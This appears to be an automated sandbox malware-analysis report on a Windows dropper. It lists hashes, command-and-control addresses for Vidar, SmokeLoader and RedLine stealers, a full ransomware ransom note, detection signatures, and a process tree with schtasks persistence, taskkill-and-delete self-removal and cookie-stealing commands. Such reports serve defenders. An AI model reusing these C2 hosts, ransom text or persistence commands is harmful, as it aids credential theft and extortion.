Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1244s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-07-2021 17:52

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-rbzFCkr9sY Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0321gDrgoSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk
URLs

https://we.tl/t-rbzFCkr9sY

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • suricata: ET MALWARE zgRAT Activity
  • suricata: ET MALWARE zgRAT Activity M2
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 41 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 20 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 11 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 27 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 7 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 29 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2752
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
      • Modifies registry class
      PID:2384
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2360
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2272
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1892
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1356
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1288
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1196
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1084
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:932
                    • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                      C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:5756
                      • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                        C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                        3⤵
                          PID:184
                      • C:\ProgramData\Provisioning\settings.exe
                        C:\ProgramData\Provisioning\settings.exe
                        2⤵
                          PID:4592
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                            3⤵
                            • Creates scheduled task(s)
                            PID:4464
                        • C:\Users\Admin\AppData\Roaming\buugrar
                          C:\Users\Admin\AppData\Roaming\buugrar
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:4280
                          • C:\Users\Admin\AppData\Roaming\buugrar
                            C:\Users\Admin\AppData\Roaming\buugrar
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5164
                        • C:\Users\Admin\AppData\Roaming\hgugrar
                          C:\Users\Admin\AppData\Roaming\hgugrar
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4400
                        • C:\Users\Admin\AppData\Roaming\edugrar
                          C:\Users\Admin\AppData\Roaming\edugrar
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5048
                        • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                          C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:4556
                          • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                            C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                            3⤵
                              PID:2468
                          • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                            C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4588
                            • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                              C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                              3⤵
                                PID:2084
                            • C:\ProgramData\Provisioning\settings.exe
                              C:\ProgramData\Provisioning\settings.exe
                              2⤵
                                PID:5720
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:5464
                              • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                                C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:5800
                                • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                                  C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                                  3⤵
                                    PID:2400
                                • C:\ProgramData\Provisioning\settings.exe
                                  C:\ProgramData\Provisioning\settings.exe
                                  2⤵
                                    PID:4772
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                      3⤵
                                      • Creates scheduled task(s)
                                      PID:4824
                                  • C:\Users\Admin\AppData\Roaming\buugrar
                                    C:\Users\Admin\AppData\Roaming\buugrar
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:3476
                                    • C:\Users\Admin\AppData\Roaming\buugrar
                                      C:\Users\Admin\AppData\Roaming\buugrar
                                      3⤵
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: MapViewOfSection
                                      PID:3408
                                  • C:\Users\Admin\AppData\Roaming\hgugrar
                                    C:\Users\Admin\AppData\Roaming\hgugrar
                                    2⤵
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:5784
                                  • C:\Users\Admin\AppData\Roaming\edugrar
                                    C:\Users\Admin\AppData\Roaming\edugrar
                                    2⤵
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:6084
                                  • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                                    C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                                    2⤵
                                      PID:5800
                                      • C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe
                                        C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab\A56A.exe --Task
                                        3⤵
                                          PID:7064
                                      • C:\ProgramData\Provisioning\settings.exe
                                        C:\ProgramData\Provisioning\settings.exe
                                        2⤵
                                          PID:2068
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                            3⤵
                                            • Creates scheduled task(s)
                                            PID:6132
                                        • C:\Users\Admin\AppData\Roaming\buugrar
                                          C:\Users\Admin\AppData\Roaming\buugrar
                                          2⤵
                                            PID:7560
                                          • C:\Users\Admin\AppData\Roaming\hgugrar
                                            C:\Users\Admin\AppData\Roaming\hgugrar
                                            2⤵
                                              PID:8244
                                            • C:\Users\Admin\AppData\Roaming\edugrar
                                              C:\Users\Admin\AppData\Roaming\edugrar
                                              2⤵
                                                PID:8264
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                              1⤵
                                                PID:68
                                              • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
                                                "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
                                                1⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4056
                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2172
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\setup_install.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\setup_install.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2440
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2744
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_1.exe
                                                        sonia_1.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2908
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_1.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_1.exe" -a
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:3652
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3896
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_2.exe
                                                        sonia_2.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:1756
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3152
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_4.exe
                                                        sonia_4.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2060
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3696
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_3.exe
                                                        sonia_3.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Modifies system certificate store
                                                        PID:3172
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 928
                                                          6⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4740
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2016
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_5.exe
                                                        sonia_5.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        PID:3200
                                                        • C:\Users\Admin\Documents\d_2XV24mXm5hzRWuvVG_XOY2.exe
                                                          "C:\Users\Admin\Documents\d_2XV24mXm5hzRWuvVG_XOY2.exe"
                                                          6⤵
                                                            PID:4968
                                                            • C:\Users\Admin\Documents\d_2XV24mXm5hzRWuvVG_XOY2.exe
                                                              "C:\Users\Admin\Documents\d_2XV24mXm5hzRWuvVG_XOY2.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:4320
                                                          • C:\Users\Admin\Documents\WHl41Zi1V1no3Cx_YpreeTCC.exe
                                                            "C:\Users\Admin\Documents\WHl41Zi1V1no3Cx_YpreeTCC.exe"
                                                            6⤵
                                                              PID:5068
                                                              • C:\Users\Admin\Documents\WHl41Zi1V1no3Cx_YpreeTCC.exe
                                                                "C:\Users\Admin\Documents\WHl41Zi1V1no3Cx_YpreeTCC.exe" -a
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4968
                                                            • C:\Users\Admin\Documents\nDsT6D2bF_8XvbzkDuD6GT1v.exe
                                                              "C:\Users\Admin\Documents\nDsT6D2bF_8XvbzkDuD6GT1v.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:5056
                                                            • C:\Users\Admin\Documents\xd2AJ8NMCJMspOgF0WVlf3Jp.exe
                                                              "C:\Users\Admin\Documents\xd2AJ8NMCJMspOgF0WVlf3Jp.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:5044
                                                            • C:\Users\Admin\Documents\_iZBramAIAi3QctsEuj47zJ4.exe
                                                              "C:\Users\Admin\Documents\_iZBramAIAi3QctsEuj47zJ4.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:5032
                                                              • C:\Users\Public\run.exe
                                                                C:\Users\Public\run.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4616
                                                                • C:\Users\Public\run.exe
                                                                  C:\Users\Public\run.exe
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:5204
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                    9⤵
                                                                      PID:2340
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /T 10 /NOBREAK
                                                                        10⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:4184
                                                              • C:\Users\Admin\Documents\BnLxXvmLo0X0QriybPwT020H.exe
                                                                "C:\Users\Admin\Documents\BnLxXvmLo0X0QriybPwT020H.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5008
                                                                • C:\Users\Admin\Documents\BnLxXvmLo0X0QriybPwT020H.exe
                                                                  C:\Users\Admin\Documents\BnLxXvmLo0X0QriybPwT020H.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4588
                                                              • C:\Users\Admin\Documents\cojFmBlmTm0O9Ce2L51i44ki.exe
                                                                "C:\Users\Admin\Documents\cojFmBlmTm0O9Ce2L51i44ki.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:5000
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:2468
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4816
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:3180
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:5812
                                                                  • C:\Users\Admin\Documents\Zn7rHLYdjKzSujf2MpIflOMB.exe
                                                                    "C:\Users\Admin\Documents\Zn7rHLYdjKzSujf2MpIflOMB.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4988
                                                                    • C:\Users\Admin\Documents\Zn7rHLYdjKzSujf2MpIflOMB.exe
                                                                      C:\Users\Admin\Documents\Zn7rHLYdjKzSujf2MpIflOMB.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4676
                                                                  • C:\Users\Admin\Documents\_aVWZDKfgeoqlh6aQ85vi6LZ.exe
                                                                    "C:\Users\Admin\Documents\_aVWZDKfgeoqlh6aQ85vi6LZ.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4980
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 656
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:4452
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 668
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:3244
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 684
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:4824
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 704
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:4172
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1120
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Program crash
                                                                      PID:5068
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1192
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:1004
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1160
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:4252
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "_aVWZDKfgeoqlh6aQ85vi6LZ.exe" /f & erase "C:\Users\Admin\Documents\_aVWZDKfgeoqlh6aQ85vi6LZ.exe" & exit
                                                                      7⤵
                                                                        PID:5244
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /im "_aVWZDKfgeoqlh6aQ85vi6LZ.exe" /f
                                                                          8⤵
                                                                          • Kills process with taskkill
                                                                          PID:5520
                                                                    • C:\Users\Admin\Documents\HzHXQDaphnxnUa5KzII0P67z.exe
                                                                      "C:\Users\Admin\Documents\HzHXQDaphnxnUa5KzII0P67z.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks processor information in registry
                                                                      PID:4456
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im HzHXQDaphnxnUa5KzII0P67z.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HzHXQDaphnxnUa5KzII0P67z.exe" & del C:\ProgramData\*.dll & exit
                                                                        7⤵
                                                                          PID:5216
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im HzHXQDaphnxnUa5KzII0P67z.exe /f
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:5380
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /t 6
                                                                            8⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:5440
                                                                      • C:\Users\Admin\Documents\RAtXNG08WLa9ngBTvFoQN0tE.exe
                                                                        "C:\Users\Admin\Documents\RAtXNG08WLa9ngBTvFoQN0tE.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4336
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          7⤵
                                                                            PID:5352
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:5536
                                                                        • C:\Users\Admin\Documents\n4xHGRkx8ze5WIsQoLivMebH.exe
                                                                          "C:\Users\Admin\Documents\n4xHGRkx8ze5WIsQoLivMebH.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:4248
                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4836
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5816
